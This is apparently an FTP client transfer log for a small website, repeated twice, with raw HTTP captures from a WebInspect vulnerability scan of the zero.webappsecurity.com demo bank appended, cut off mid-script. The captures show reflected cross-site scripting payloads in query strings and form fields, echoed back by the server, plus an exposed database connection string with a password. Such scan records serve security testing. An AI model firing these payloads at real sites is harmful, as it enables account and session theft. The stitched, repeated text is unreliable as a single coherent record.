10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:47 B C:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:47 B C:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:47 B C:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:47 B C:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:47 B C:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:47 B C:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:47 B C:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:47 B C:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:47 B C:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:47 B C:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:47 B C:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:47 B C:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:47 B C:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 170
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=</textarea><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 418
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = </textarea><script>alert('XSS')</script></P><br>
<P>The <b>hidden</b> parameter "txtHidden" = </textarea><script>alert('XSS')</script></P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /plink.asp?a=b&c=>"><script>alert("XSS")</script> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 197
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = b</P>
<P>The parameter "c" = >"><script>alert("XSS")</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
POST /testing/pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
cboPage=>"'><img%20src="javascript:alert('XSS')">HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:38 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 193
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was >"'><img src="javascript:alert('XSS')">
</body>
</html>
GET /banklogin.asp?err=>"'><img%20src="javascript:alert('XSS')"> HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:37:05 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4954
Content-Type: text/html
Cache-control: private
Set-Cookie: state=; path=/
Set-Cookie: userid=; path=/
Set-Cookie: username=; path=/
Set-Cookie: sessionid=; path=/
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<TABLE BGCOLOR="#ffffff" STYLE="border: 3px solid black">
<TR>
<TD
STYLE="border-left: 12px solid #2E7AA3; border-top: 7px solid #2E7AA3"
HEIGHT="47" ROWSPAN="2" VALIGN="TOP"><IMG
SRC="/images/freebank-logo2.gif" ALIGN="LEFT" BORDER="0" WIDTH="150"
HEIGHT="50"><BR><BR></TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571" HEIGHT="47"
VALIGN="TOP"> </TD>
<TD STYLE="border-top: 7px solid #2E7AA3" WIDTH="571"
VALIGN="TOP"> </TD>
</TR>
<TR>
<TD WIDTH="571" VALIGN="TOP" ROWSPAN="7" HEIGHT="49">
<TABLE>
<TR>
<TD BGCOLOR="#2E7AA3" STYLE="border: 1px solid black" WIDTH="258"
HEIGHT="217">
<FORM ACTION="login1.asp" METHOD="post">
<CENTER>>"'><img src="javascript:alert('XSS')"><br>Username:<BR><INPUT TYPE="text" NAME="login"
STYLE="border: 1px solid black; spacing: 0"><BR>Password:<BR><INPUT TYPE="password"
NAME="password" STYLE="border: 1px solid black; spacing: 0"><BR><INPUT
TYPE="radio" NAME="graphicOption" VALUE="minimum" CHECKED="CHECKED"><FONT
SIZE="-1">Minimum Graphics</FONT><BR><INPUT TYPE="radio" NAME="graphicOption"
VALUE="standard"><FONT SIZE="-1">Standard Graphics</FONT><BR><BR><INPUT
TYPE="submit" STYLE="border: 1px solid black"
VALUE=" Access Accounts "><BR></CENTER></FORM></TD>
<TD STYLE="border: 1px solid black" WIDTH="304" HEIGHT="217"
ROWSPAN="2"><IMG SRC="/images/lock.gif" WIDTH="304" HEIGHT="266"
BORDER="0"></TD>
</TR>
<TR>
<TD BGCOLOR="ffffff" STYLE="border: 1px solid black" WIDTH="258" HEIGHT="241"
VALIGN="TOP"><FONT SIZE="-2">We are confident of our system's ability to
protect all transactions; however, this is not an invitation for people to
attempt unauthorized access to the system. This is a private computing system
which is restricted to authorized individuals. Actual or attempted unauthorized
use of this computer system may result in criminal and/or civil prosecution. We
reserve the right to view, monitor, and record activity on the system without
notice or permission. Any information obtained by monitoring, reviewing, or
recording is subject to review by law enforcement organizations in connection
with the investigation or prosecution of possible criminal activity on the
system. If you are not an authorized user of this system or do not consent to
continued monitoring, exit the system at this time. </FONT></TD>
</TR>
</TABLE></TD>
<TD WIDTH="175" VALIGN="TOP" ROWSPAN="7"><table width="175" border="0" cellspacing="3" cellpadding="5">
<tr>
<td STYLE="border: 1px solid black"><p><img src="images/SPI_logo.jpg" width="150" height="36"></p>
<p><font size="2" face="Arial, Helvetica, sans-serif">If you would
like a free trial version of WebInspect to test this website
site.</font></p>
<p><font size="2" face="Arial, Helvetica, sans-serif"><a href="http://www.spidynamics.com/download.html" target="_blank"><strong>Download Click Here</strong></a></font></p></td>
</tr>
</table></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-login.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><A
HREF="/pindex.asp"><IMG SRC="/images/financial-planning.gif" ALIGN="LEFT"
BORDER="0" WIDTH="150" HEIGHT="20"></A></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="19"><IMG SRC="/images/services.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"
HEIGHT="24"><IMG SRC="/images/your-accounts.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border: 2px solid #2E7AA3" WIDTH="162"><IMG
SRC="/images/customer-support.gif" ALIGN="LEFT" HEIGHT="20"
BORDER="0"></TD>
</TR>
<TR>
<TD STYLE="border-left: 12px solid #2E7AA3" WIDTH="162"
ALIGN="CENTER">
<FORM ACTION="rootlogin.asp" METHOD="post">
<P><FONT SIZE="-1" FACE="Arial"> Register for an Interest Checking
Account with FreeBank:</FONT></P>
<P><FONT SIZE="-1" FACE="Arial">First Name:</FONT><INPUT
TYPE="text" NAME="txtPassPhrase"
STYLE="border: 1px solid black; spacing: 0"><BR><FONT SIZE="-1"
FACE="Arial">Last Name:</FONT><INPUT TYPE="text" NAME="txtName"
STYLE="border: 1px solid black; spacing: 0"><BR>
<INPUT TYPE="hidden" NAME="txtHidden" VALUE="This was hidden from the user">
<INPUT TYPE="submit" STYLE="border: 1px solid black"
VALUE="Register"></P></FORM></TD>
</TR>
</TABLE>
</BODY>
</HTML>
GET /pcomboindex.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:18 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 716
Content-Type: text/html
Cache-control: private
<html>
<body>
A user should never see this text<br>
this page is a redirect only page. The page that the user
selected was <br>
Page was looking for a value in parameter called cboPage<br><br>
<h2>What follows is a dump of the HTTP stuff</h2>
<b>Form Variables Passed:</b><br><b>QueryString variables passed:</b><br><pre>****** Head Data***
Client IP:199.72.29.34
Connection: Close
Host: zero.webappsecurity.com
Referer: http://zero.webappsecurity.com:80/pindex.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
****** End of Head Data*******</pre><br>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=1"style="background:url(javascript:alert('XSS'))"%20"&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:24 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
POST /login1.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Content-Length: 103
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
login=333%2D333%2D3333test@test999.com&password=333%2D333%2D3333test@test999.com&graphicOption=standardHTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:17 GMT
X-Powered-By: ASP.NET
Location: banklogin.asp?err=Invalid Login: 333-333-3333test@test999.com
Connection: Keep-Alive
Content-Length: 121
Content-Type: text/html
Cache-control: private
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="">here</a>.</body>
GET /plink.asp?a=>"><script>alert('XSS')</script>&c=12 HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:36:57 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 198
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "a" = >"><script>alert('XSS')</script></P>
<P>The parameter "c" = 12</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /testing/p2.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/testing/pcomboindex.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:48 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 345
Content-Type: text/html
Cache-control: private
<font face="Arial" size=2>
<p>Active Server Pages</font> <font face="Arial" size=2>error 'ASP 0126'</font>
<p>
<font face="Arial" size=2>Include file not found</font>
<p>
<font face="Arial" size=2>/testing/p2.asp</font><font face="Arial" size=2>, line 4</font>
<p>
<font face="Arial" size=2>The include file 'footer.inc' was not found.
</font> GET /_vti_txt/.FBCIndex HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:49:19 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
